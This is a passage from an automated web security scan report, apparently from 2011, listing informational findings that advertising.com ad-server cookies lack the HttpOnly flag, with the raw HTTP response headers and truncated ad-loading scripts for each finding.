ROLL=U6APVjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7NO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
63734715=_4dfa55fe,2103643680,768033^1021113^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1021113.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:14:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 596
Date: Thu, 16 Jun 2011 19:14:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=+Xl+NFJwHob0Ff6sIWwJoasitKPCC0nBcJpwEg02FQMBdbdBETwihXAxEwjmGQMBxGeBETAQvaAxEQW4FQMBLppBETQghXAxEgN5FQMB6ijBETAmhXAxEAY4FQMBdDmBETA/yaAxEAVZGQMBYimBETA3WaAxEQY4FQMBFGeBETAxBaAxEU1aGQMBbTeBETQwBaAxEYnXGQMBWGoBETgQvaAxEogmGQMBxmpBETQRgaAxE0soGQMB8mpBEHZAmZOiGcZj0jw+NXMbtiGA8Mohi7a+AcsmGKuAEOpR/aLuBoKuGe/smJwoka0vzClALRqR/WaxAMdPGLwrQQwdIa8gq62ApVmhtTqHIUbNG2WtrCQIzaoIwOICM/oxudr0IwKvG8Gt5jwMvaAc; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
Set-Cookie: F1=B4fV63EBAAAABAAAAwBA0BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
Set-Cookie: BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKDL!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
Set-Cookie: ROLL=U6APVjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7NO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:06 GMT; path=/
Set-Cookie: 63734715=_4dfa55fe,2103643680,768033^1021113^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N884.AOL-Advertising/B5043385.2;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=74200963/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=2cl+NFJwHob0Fe6sIWwJoaoitKPCC0nxbJpwEg02FPMBdbdxDTwihX8wEwjmGPMBxGexDTAQva8wEQW4FPMBLppxDTQghX8wEgN5FPMB6ijxDTAmhX8wEAY4FPMBdDmxDTA/ya8wEAVZGPMBYimxDTA3Wa8wEQY4FPMBFGexDTAxBa8wEU1aGPMBbTexDTQwBa8wEYnXGPMBWGoxDTgQva8wEogmGPMBxmpxDTQRga8wE0soGPMB8mpxDHZAmZOiGbZj0jw+NXActiGA8MoRi7a+AcsmGJuAEOpB/aLuBoKuGd/smJwokawvzClALRqB/WaxAMdPGKwrQQwdIa4gq62ApVmRtTqHIUbNG1WtrCQIzakIwOICM/ohudr0IwKvG7Gt5jwMva8b; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
F1=BYzV63EBAAAABAAAA0BAyBA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
BASE=x7Q9mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKD70AMyNVhK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
ROLL=U6APajemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7NeGo6Nl6iN!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
74200963=_4dfa5736,7160602726,768033^894882^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894882.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:19:18 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 677
Date: Thu, 16 Jun 2011 19:19:19 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=2cl+NFJwHob0Fe6sIWwJoaoitKPCC0nxbJpwEg02FPMBdbdxDTwihX8wEwjmGPMBxGexDTAQva8wEQW4FPMBLppxDTQghX8wEgN5FPMB6ijxDTAmhX8wEAY4FPMBdDmxDTA/ya8wEAVZGPMBYimxDTA3Wa8wEQY4FPMBFGexDTAxBa8wEU1aGPMBbTexDTQwBa8wEYnXGPMBWGoxDTgQva8wEogmGPMBxmpxDTQRga8wE0soGPMB8mpxDHZAmZOiGbZj0jw+NXActiGA8MoRi7a+AcsmGJuAEOpB/aLuBoKuGd/smJwokawvzClALRqB/WaxAMdPGKwrQQwdIa4gq62ApVmRtTqHIUbNG1WtrCQIzakIwOICM/ohudr0IwKvG7Gt5jwMva8b; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: F1=BYzV63EBAAAABAAAA0BAyBA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: BASE=x7Q9mi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPGnvMOKD70AMyNVhK!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: ROLL=U6APajemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGAs5By7NeGo6Nl6iN!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:19:18 GMT; path=/
Set-Cookie: 74200963=_4dfa5736,7160602726,768033^894882^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000894
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=74864635/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=qdk+NFJwHob0Fr6sIWwJoacjtKPCC0nBfJpwEg02FcMBdbdBHTwihXwxEwjmGcMBxGeBHTAQvawxEQW4FcMBLppBHTQghXwxEgN5FcMB6ijBHTAmhXwxEAY4FcMBdDmBHTA/yawxEAVZGcMBYimBHTA3WawxEQY4FcMBFGeBHTAxBawxEU1aGcMBbTeBHTQwBawxEYnXGcMBWGoBHTgQvawxEogmGcMBxmpBHTQRgawxE0soGcMB8mpBHHZAmZOiGoZj0jw+NX8btiGA8Mohl7a+AcsmGWuAEOpRCbLuBoKuGq/smJwokakwzClALRqRCXaxAMdPGXwrQQwdIash; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
F1=Bo2R63EBAAAABAAAAwAAMCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
BASE=x7Q9Vi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vI!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
ROLL=U6APFjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2O!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
74864635=_4dfa476a,7008281818,768033^924216^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924216.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:11:54 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 607
Date: Thu, 16 Jun 2011 18:11:54 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=qdk+NFJwHob0Fr6sIWwJoacjtKPCC0nBfJpwEg02FcMBdbdBHTwihXwxEwjmGcMBxGeBHTAQvawxEQW4FcMBLppBHTQghXwxEgN5FcMB6ijBHTAmhXwxEAY4FcMBdDmBHTA/yawxEAVZGcMBYimBHTA3WawxEQY4FcMBFGeBHTAxBawxEU1aGcMBbTeBHTQwBawxEYnXGcMBWGoBHTgQvawxEogmGcMBxmpBHTQRgawxE0soGcMB8mpBHHZAmZOiGoZj0jw+NX8btiGA8Mohl7a+AcsmGWuAEOpRCbLuBoKuGq/smJwokakwzClALRqRCXaxAMdPGXwrQQwdIash; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
Set-Cookie: F1=Bo2R63EBAAAABAAAAwAAMCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
Set-Cookie: BASE=x7Q9Vi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vI!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
Set-Cookie: ROLL=U6APFjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2O!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:11:54 GMT; path=/
Set-Cookie: 74864635=_4dfa476a,7008281818,768033^924216^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=00007680
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=75388116/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=aEl+NFJwHob0Fj6sIWwJoa8itKPCC0nBdJpwEg02FUMBdbdBFTwihXQxEwjmGUMBxGeBFTAQvaQxEQW4FUMBLppBFTQghXQxEgN5FUMB6ijBFTAmhXQxEAY4FUMBdDmBFTA/yaQxEAVZGUMBYimBFTA3WaQxEQY4FUMBFGeBFTAxBaQxEU1aGUMBbTeBFTQwBaQxEYnXGUMBWGoBFTgQvaQxEogmGUMBxmpBFTQRgaQxE0soGUMB8mpBFHZAmZOiGgZj0jw+NXcbtiGA8Mohj7a+AcsmGOuAEOpRAbLuBoKuGi/smJwokaEwzClALRqRAXaxAMdPGPwrQQwdIaMhq62ApVmhuTqHIUbNG6WtrCQIza4IwOICM/oxvdr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
F1=BoRU63EBAAAABAAAAYBA8BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
BASE=x7Q9fi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINB!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
ROLL=U6APTjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0E!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
75388116=_4dfa511a,3065784557,768033^1029515^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029515.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:53:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 621
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:53:14 GMT
Connection: close
Set-Cookie: C2=aEl+NFJwHob0Fj6sIWwJoa8itKPCC0nBdJpwEg02FUMBdbdBFTwihXQxEwjmGUMBxGeBFTAQvaQxEQW4FUMBLppBFTQghXQxEgN5FUMB6ijBFTAmhXQxEAY4FUMBdDmBFTA/yaQxEAVZGUMBYimBFTA3WaQxEQY4FUMBFGeBFTAxBaQxEU1aGUMBbTeBFTQwBaQxEYnXGUMBWGoBFTgQvaQxEogmGUMBxmpBFTQRgaQxE0soGUMB8mpBFHZAmZOiGgZj0jw+NXcbtiGA8Mohj7a+AcsmGOuAEOpRAbLuBoKuGi/smJwokaEwzClALRqRAXaxAMdPGPwrQQwdIaMhq62ApVmhuTqHIUbNG6WtrCQIza4IwOICM/oxvdr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
Set-Cookie: F1=BoRU63EBAAAABAAAAYBA8BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
Set-Cookie: BASE=x7Q9fi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINB!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
Set-Cookie: ROLL=U6APTjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0E!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:14 GMT; path=/
Set-Cookie: 75388116=_4dfa511a,3065784557,768033^1029515^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.2;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=76474621/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=4Tk+NFJwHob0Ft6sIWwJoakjtKPCC0nhfJpwEg02FeMBdbdhHTwihX4xEwjmGeMBxGehHTAQva4xEQW4FeMBLpphHTQghX4xEgN5FeMB6ijhHTAmhX4xEAY4FeMBdDmhHTA/ya4xEAVZGeMBYimhHTA3Wa4xEQY4FeMBFGehHTAxBa4xEU1aGeMBbTehHTQwBa4xEYnXGeMBWGohHTgQva4xEogmGeMBxmphHTQRga4xE0soGeMB8mphHHZAmZOiGqZj0jw+NXobtiGA8MoBm7a+AcsmGYuAEOpxCbLuBoKuGs/smJwokaswzClALRqxCXaxAMdPGZwrQQwdIa0h; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
F1=BgPR63EBAAAABAAAAkAAQCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
BASE=x7Q9Ti23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wZjCzrmHH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
ROLL=U6APGjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
76474621=_4dfa44f8,0221667354,768033^1005068^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1005068.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:01:28 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 600
Date: Thu, 16 Jun 2011 18:01:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=4Tk+NFJwHob0Ft6sIWwJoakjtKPCC0nhfJpwEg02FeMBdbdhHTwihX4xEwjmGeMBxGehHTAQva4xEQW4FeMBLpphHTQghX4xEgN5FeMB6ijhHTAmhX4xEAY4FeMBdDmhHTA/ya4xEAVZGeMBYimhHTA3Wa4xEQY4FeMBFGehHTAxBa4xEU1aGeMBbTehHTQwBa4xEYnXGeMBWGohHTgQva4xEogmGeMBxmphHTQRga4xE0soGeMB8mphHHZAmZOiGqZj0jw+NXobtiGA8MoBm7a+AcsmGYuAEOpxCbLuBoKuGs/smJwokaswzClALRqxCXaxAMdPGZwrQQwdIa0h; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
Set-Cookie: F1=BgPR63EBAAAABAAAAkAAQCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
Set-Cookie: BASE=x7Q9Ti23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1wZjCzrmHH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
Set-Cookie: ROLL=U6APGjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:01:28 GMT; path=/
Set-Cookie: 76474621=_4dfa44f8,0221667354,768033^1005068^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6751.4298.ADVERTISING.COM/B5433785;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=83985251/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=41k+NFJwHob0Fm6sIWwJoaIjtKPCC0nxdJpwEg02FXMBdbdxFTwihXcxEwjmGXMBxGexFTAQvacxEQW4FXMBLppxFTQghXcxEgN5FXMB6ijxFTAmhXcxEAY4FXMBdDmxFTA/yacxEAVZGXMBYimxFTA3WacxEQY4FXMBFGexFTAxBacxEU1aGXMBbTexFTQwBacxEYnXGXMBWGoxFTgQvacxEogmGXMBxmpxFTQRgacxE0soGXMB8mpxFHZAmZOiGjZj0jw+NXobtiGA8MoRk7a+AcsmGRuAEOpBBbLuBoKuGl/smJwokaQwzClALRqBBXaxAMdPGSwrQQwdIaYhq62ApVmRvTqHIUbNG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
F1=BgXT63EBAAAABAAAAIBACCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
BASE=x7Q9bi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaKH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
ROLL=U6APPjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
83985251=_4dfa4d78,7117460224,768033^951514^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.951514.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:37:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 553
Date: Thu, 16 Jun 2011 18:37:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=41k+NFJwHob0Fm6sIWwJoaIjtKPCC0nxdJpwEg02FXMBdbdxFTwihXcxEwjmGXMBxGexFTAQvacxEQW4FXMBLppxFTQghXcxEgN5FXMB6ijxFTAmhXcxEAY4FXMBdDmxFTA/yacxEAVZGXMBYimxFTA3WacxEQY4FXMBFGexFTAxBacxEU1aGXMBbTexFTQwBacxEYnXGXMBWGoxFTgQvacxEogmGXMBxmpxFTQRgacxE0soGXMB8mpxFHZAmZOiGjZj0jw+NXobtiGA8MoRk7a+AcsmGRuAEOpBBbLuBoKuGl/smJwokaQwzClALRqBBXaxAMdPGSwrQQwdIaYhq62ApVmRvTqHIUbNG9G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: F1=BgXT63EBAAAABAAAAIBACCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: BASE=x7Q9bi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaKH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: ROLL=U6APPjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:37:43 GMT; path=/
Set-Cookie: 83985251=_4dfa4d78,7117460224,768033^951514^1183^0,0_; domain=advertising.com; path=/click

document.write('<script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/14302-119028-28901-0?mpt=7117460224&mpvc=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000951514/
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=90208788/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

